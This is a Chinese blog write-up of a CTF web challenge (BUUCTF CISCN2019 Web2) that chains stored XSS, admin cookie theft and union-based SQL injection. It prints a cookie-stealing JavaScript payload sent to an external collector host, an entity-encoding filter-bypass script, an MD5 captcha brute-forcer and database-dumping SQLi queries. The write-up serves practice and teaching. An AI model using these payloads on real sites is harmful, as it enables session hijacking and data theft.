BUUCTF:[CISCN2019 华东北赛区]Web2

最新推荐文章于 2024-08-05 16:12:51 发布
最新推荐文章于 2024-08-05 16:12:51 发布
阅读量2.6k 收藏 2
点赞数 3
分类专栏: CTF_WEB_Writeup
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mochu7777777/article/details/105212961
版权

BUUCTF:[CISCN2019 华东北赛区]Web2

参考:https://blog.csdn.net/weixin_44677409/article/details/100741998

经测试发现存在以下页面:
index.php
admin.php
login.php
register.php
post.php
commitbug.php
about.php

在这里插入图片描述
admin.php没有权限登录,联系下文估计是要得到admin的session登录
在这里插入图片描述
投稿存在XSS,但是存在一些过滤,使用Markup
转码,然后eval执行JS代码,并且需要一个window.location.href来自动触发刷新颜面
使用题目提供的站内XSS平台
在这里插入图片描述
添加windows.location.href,并删去if判断那一段

(function(){window.location.href='http://xss.buuoj.cn/index.php?do=api&id=arHAGx&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();

然后利用脚本,进行编码绕过,并且执行

xss='''(function(){window.location.href='http://xss.buuoj.cn/index.php?do=api&id=arHAGx&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();'''
output = ""
for c in xss:
    output += "&#" + str(ord(c))

print("<svg><script>eval&#40&#34" + output + "&#34&#41</script>")

在这里插入图片描述
然后把这些payload插入投稿
文章地址:http://24175362-da9c-4f99-bb8d-110e10bfb9bf.node3.buuoj.cn/post/1b34bb5a26804f2410d6746d2129bb7b.html

在这里插入图片描述
在反馈页面反馈,刚刚发布的那篇文章,是的管理员去查看带有XSS的文章
MD5验证码脚本:

import hashlib

def func(md5_val):
    for x in range(999999, 100000000):
        md5_value=hashlib.md5(str(x)).hexdigest()
        if md5_value[:6]==md5_val:
            return str(x)

if __name__ == '__main__':
    print func('b76301')

在这里插入图片描述
这里注意文章地址在反馈的时候要改成
http://web.node3.buuoj.cn/post/1b34bb5a26804f2410d6746d2129bb7b.html
在这里插入图片描述
在这里插入图片描述
XSS平台接收到一个来自内网访问的请求,这就是管理元的访问,使用这个PHPSESSION登录admin.php
在这里插入图片描述
登陆成功,经过测试发现是个很简单的联合查询注入,一系列注入payload如下:

-2 union select 1,2,3#

-2 union select 1,database(),user()#

-2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ciscn'#

-2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='flag'#

-2 union select 1,2,group_concat(flagg) from ciscn.flag#

在这里插入图片描述

末 初
关注
专栏目录
[CISCN2019 东北赛区]Web2
qq_42551635的博客
05-13 470
[CISCN2019 东北赛区]Web2 前言 特别好的一道题,做完神清气爽,学到好多东西 知识点 xss 攻击获取cookie buu攻击平台 利用 cookie 获取管理员权限 获取到管理员cookie后,利用控制台中的application模块,修改页面cookie md5验证码哈希 import hashlib def func(md5_val): for x in range(999999, 100000000): md5_value=hashlib.md5(str(x
BUUCTF-CISCN-东北赛区Web-XSS
迷风小白
09-11 4576
XSS 拿到题目出现如下界面 随便点击测试一下,发现需要注册登录,随即注册一个用户登录(admin用户不能注册) 发现有投稿和反馈这两个页面可以操作 结合标题再看看这两个页面,投稿页面是用来放XSS的,然后在反馈给管理员这样我们就能拿到管理员的cookie,因为这里是内网环境,所以只能去 http://xss.buuoj.cn 注册账号来接收cookie。 经过测试发现提交的内容部分会被转义...
BUUCTF--[CISCN2019 东北赛区]Web2
qq_46263951的博客
07-25 473
进入之后我们看到的是一个blog页面, 随便注册一个账号进入 通过扫描目录发现admin.php,访问后给出以下提示 所以这里我们需要一个admin的cookie 再来看各个页面的作用 投稿:我们输入一段内容,然后会给出显示我们文章内容的链接,这里存在着存储型xss漏洞 反馈:通过提示我们可以知道我们提交反馈的链接admin用户会去访问,所以我们可以通过这里来获取的admin的cookie 大致流程:投稿处提交我们的xss代码--获取代码所在的链接--反馈给admin--获取cookie .
Buuctf】XSS-Lab
最新发布
2202_75354817的博客
08-05 705
这关卡越往后越离谱,前十几关用来练练绕过技巧还是不错的。而且有些关卡的组件不能用了,影响做题。
BUUCTF:[CISCN2019 东南赛区]Web4 ---- jwt的加密,解密 复习 ---- 一个奇怪的 jwt 的secret方法
Zero_Adam的博客
04-19 926
目录:一、自己做:1.没有思路啦,,2.没有思路啦,,二、学到的&&不足:三、学习WP 一、自己做: **注:**没有思路的地方,就是我看WP的地方。 解解jwt瞅瞅, 有加密的东西,我目前遇到过的jwt解法:弱密钥碰撞,碰撞出密钥来,就可以修改数据了,二:无密钥检测,用python重写一个无验证的jwt,有可能也成功, 再是一个进阶的方法:如果是SA256不对称加密的化,我们没办法破解,但是可以用SH256加密的方法巴拉巴拉给弄出来,没遇到过题,然后懒,,没有细细研究, 我*???,我正
[CISCN2019 东南赛区]Web11 1(SSTI,smarty,X-Forwarded-For)
weixin_45577185的博客
10-16 455
知识点: SSTI smarty X-Forwarded-For Smarty是一个PHP的模板引擎,提供让程序逻辑与页面显示 (HTML/CSS)代码分离的功能。对于该框架的SSTI漏洞很多 文章往往只是一笔带过,讲解的重心往往在flask等框架上。 看到这个我就想到了抓包修改XFF试试加入X-Forwarded-For 发现Current IP更改为相应值 回想到曾经做过的题,用SSTI 发现存在注入 获取当前目录有那些文件:X-Forwarded-For:{system(‘ls’)}
buuctf web [CISCN2019 东南赛区]Web11
qq_40327508的博客
03-11 734
buuctf web [CISCN2019 东南赛区]Web11 进入后页面是这样的 可以通过最低端发现是Smarty SSTI,又从右上角得知是通过ip注入 使用burp构造X-Forwarded-For开始注入 从返回14看出确实存在注入,接下来根据smarty手册返回版本号等 最后读取flag ...
BUUCTF-[CISCN2019 东北赛区]Web2
AndyNoel的博客
05-13 515
BUUCTF-[CISCN2019 东北赛区]Web2 看题 一个论坛,内容不错:) 可以投稿,点击投稿发现要注册,那就先注册登录。随便账号密码就行。 常规操作,扫一下站点,发现有admin.php,进行访问 思路 有session,可以确定一个思路,获取管理员的session得到权限,然后拿到flag 执行 去投稿,发现存在XSS漏洞,但是有一些过滤,''(''被转义成了"(",存在WAF,先转码,然后eval执行JS代码,并且需要一个window.location.href来自动触发刷新页面 使用
[CISCN2019 赛区 Day2 Web1]Hack World
evil_ming的博客
04-23 121
打开靶机 意思是在flag表里的flag字段,然后需要我们提供id。 先输入列数试试。 1 想什么东西,继续 2 嘛,如果愿意直接给flag我那也不是不能将就的。 3 欧克到这里就不行了。 用bp简单抓个包然后发送到intruder,字典上网搜了些sql常用的字符,跑了一下发现 这些显示482 猜测是布尔盲注 浅学一下 很烦,按照大佬的脚本结果返回Process finished with exit code 1给我,搞了两个小时,暂时放着吧。 ...
BUUCTF XSS闯关1
m0_74167420的博客
04-18 1955
使用'1闭合后面的单引号,当然也可以使用"//"将其注释,最终 username = alert(1);这段代码是一个简单的JavaScript脚本,其中包含一个alert函数调用,用于显示一个弹出框,内容为"xss"。javascript:alert(1),浏览器会把javascript后面的内容当做代码执行,直接在当前页面执行。所以执行:autosubmit=1&action=JavaScript:alert(1);
BUUCTF刷题 XSS-Lab
weixin_54438700的博客
07-21 1186
alert("XSS")>level 1中的JS代码alert("XSS")level 1中的JS代码alert("XSS")
---------已搬运-------BUUCTF:[BJDCTF 2nd]xss之光 ------------ 反序列PHP原生类的应用 -----------git小操作
Zero_Adam的博客
02-25 280
目录:一、自己做:二、不足&&收获三、学习WP 一、自己做: 就到源码泄露那里,而且我自己也不会git操作。。。 -<?php -$a = $_GET['yds_is_so_beautiful']; -echo unserialize($a); 二、不足&&收获 进一步晓得了 PHP 反序列化中的原生类的应用 alert(1)不行的时候,多试试别的。什么弹cookie 啊。跳转网页啊。都试试 三、学习WP 没有类的情况下,可以进行原生类反序列化 参考文献:反序列化
BuuCTF[第二章 web进阶]XSS闯关
m_de_g的博客
07-27 5573
** [第二章 web进阶]XSS闯关 ** 一、解题思路 1.一来看了一下题目的说明 我们需要执行alert函数 那就开启闯关模式,第一关,一看这个URL就很奇怪没直接上手,二话没说成功下一关 http://491c2e5e-9e61-408a-b82d-6615548d150b.node4.buuoj.cn/level1?username=<script>alert('xss')</script> 通过观察url,我惊奇的发现闯关的关卡,是由level1,level2…,我
BUUCTF[第二章Web进阶]XSS闯关教程
DMXA的博客
11-01 710
攻击方式:这种攻击多见于论坛、博客和留言板,攻击者在发帖的过程中,将恶意代码连同正常信息一起注入帖子的内容中。当目标用户访问该链接时,服务器接收该目标用户的请求并进行处理,然后服务器把带有XSS代码的数据发送给目标用户的浏览器,浏览器解析这段带有XSS代码的恶意脚本后,就会触发XSS漏洞。存储型XSS又称为持久型XSS,攻击脚本将被永久的放在目标服务器的数据库或文件中,具有很高的隐蔽性。DOM型XSS其实是一种特殊的反射型XSS,它基于DOM文档对象模型的一种漏洞。(3)DOM型XSS。
【CTF练习】BUU XSS COURSE 1(XSS获取cookie登录)
m0_73866435的博客
02-28 2401
有两个尝试点。
2020/7/17 - [CISCN2019 东北赛区]Web2 - xss、html markup、SQL注入
抒情诗
07-17 321
做一道复杂的题锻炼一下 文章目录1.判断是xss2.盗cookie的payload3.SQL注入获得flag 1.判断是xss 这是一个类似博客的界面,而博客常见的漏洞就是xss,通过让别人浏览或者点击某处盗取身份。 由此处大概能感觉到是xss了,在内网xss平台弄(第二次搞xss,第一次是在pikachu上面弄的)。 2.盗cookie的payload 看了一下wp,因为我对xss并不是很熟悉,他们说要自动触发,需要把payload略改一下,改成下面。 (function(){window.locat
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

末 初

谢谢老板!

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值